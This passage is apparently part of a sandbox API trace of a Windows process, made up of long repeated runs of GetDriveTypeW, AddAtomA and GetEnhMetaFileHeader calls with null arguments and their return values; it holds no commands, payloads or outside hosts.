returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.771] AddAtomA (lpString=0x0) returned 0x0 [0115.771] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.772] AddAtomA (lpString=0x0) returned 0x0 [0115.772] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.773] AddAtomA (lpString=0x0) returned 0x0 [0115.773] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) 
returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.774] AddAtomA (lpString=0x0) returned 0x0 [0115.774] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.775] AddAtomA (lpString=0x0) returned 0x0 [0115.775] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.776] AddAtomA (lpString=0x0) returned 0x0 [0115.776] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) 
returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.777] AddAtomA (lpString=0x0) returned 0x0 [0115.777] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.778] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0115.778] AddAtomA (lpString=0x0) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.779] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 
0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
